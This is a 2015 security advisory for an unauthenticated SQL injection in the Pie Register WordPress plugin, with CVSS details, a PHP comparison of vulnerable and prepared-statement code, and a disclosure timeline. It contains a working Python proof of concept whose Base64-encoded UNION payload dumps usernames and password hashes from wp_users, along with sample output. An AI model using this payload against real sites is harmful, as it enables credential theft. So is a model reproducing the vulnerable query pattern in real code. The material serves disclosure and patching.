Pie Register 2.0.14-2.0.15, SQL Injection
User input is not validated correctly when accepting an Invitation Code, so an SQL injection attack is possible. The attack is triggered when the parameters ‘show_dash_widget’ and ‘invitaion_code’ (sic) are supplied to any page, by any user (anonymous or otherwise). The value of the ‘invitaion_code’ parameter is Base64-decoded and then inserted into the query without a prepared statement, so an attacker can UNION their own query onto it, as the PoC below demonstrates.
Homepage
https://wordpress.org/plugins/pie-register/
CVSS Score
5
CVSS Vector
(AV:N/AC:L/Au:N/C:P/I:N/A:N)
Attack Scope
remote
Authorization Required
None
Mitigation
Uninstall the plugin – or patch manually
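For anyone patching by hand, the following is an added illustration (not the plugin's own code) of the vulnerable shape the advisory describes next to a hardened version: the table name, the column name, the expected code format and the request handling are assumptions; only the parameter name and the $wpdb API are real.

```php
<?php
// Vulnerable shape: base64-decode the parameter and splice it straight into SQL.
// A value such as "') UNION SELECT ...#" becomes part of the statement text.
function lookup_invitation_vulnerable( $wpdb ) {
    $code = base64_decode( $_REQUEST['invitaion_code'] );
    return $wpdb->get_results(
        "SELECT * FROM {$wpdb->prefix}pie_invites WHERE code = ('" . $code . "')"
    );
}

// Hardened: strict decode, allow-list the expected format, bind with prepare().
function lookup_invitation_safe( $wpdb ) {
    if ( ! isset( $_REQUEST['invitaion_code'] ) ) {
        return null;
    }
    // Strict mode makes base64_decode() return false for anything that is not valid Base64.
    $code = base64_decode( wp_unslash( $_REQUEST['invitaion_code'] ), true );
    // Hypothetical invitation-code format: reject anything outside it instead of guessing.
    if ( false === $code || ! preg_match( '/^[A-Za-z0-9-]{1,64}$/', $code ) ) {
        return null;
    }
    // %s is quoted and escaped by $wpdb->prepare(); the value never becomes SQL syntax.
    $sql = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}pie_invites WHERE code = %s",
        $code
    );
    return $wpdb->get_results( $sql );
}
```

The allow-list check alone would stop this particular payload, but the prepared statement is what removes the class of bug, so apply both.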
Proof of Concept
The PoC below outputs a list of usernames and password hashes from the target database.
import requests,base64,re
url="http://localhost"
query = "') UNION SELECT (SELECT GROUP_CONCAT(CONCAT_WS(',',user_login,user_pass)) FROM wp_users GROUP BY 1=1),2#"
query_encoded = base64.b64encode(query)
params = {
"show_dash_widget":1,
"invitaion_code":query_encoded
}
r = requests.get(url, params=params)
print re.search(r"<tr><td>([^<]*?)<", r.text).group(1)
Output
~$ python g0blin-00040.py
test,$P$BlI29cUx2Z0Wpt0DHALldoY.CCGrha0
Timeline
- 2015-03-16: Discovered
- 2015-03-16: Vendor notified
- 2015-03-17: Vendor responded – already fixed in a pending 2.0.15 release – stated would allow for review prior to release
- 2015-03-24: Vendor responded – stated new version in testing – will be released mid April
- 2015-04-13: Update requested from Vendor
- 2015-04-20: Update requested from Vendor
- 2015-04-20: Vendor states new version
- 2015-04-29: Update requested from Vendor – stated reports to be released on Monday due to lack of communication
- 2015-04-30: Version 2.0.15 released – issue still present – no chance for review given
- 2015-05-04: Advisory released: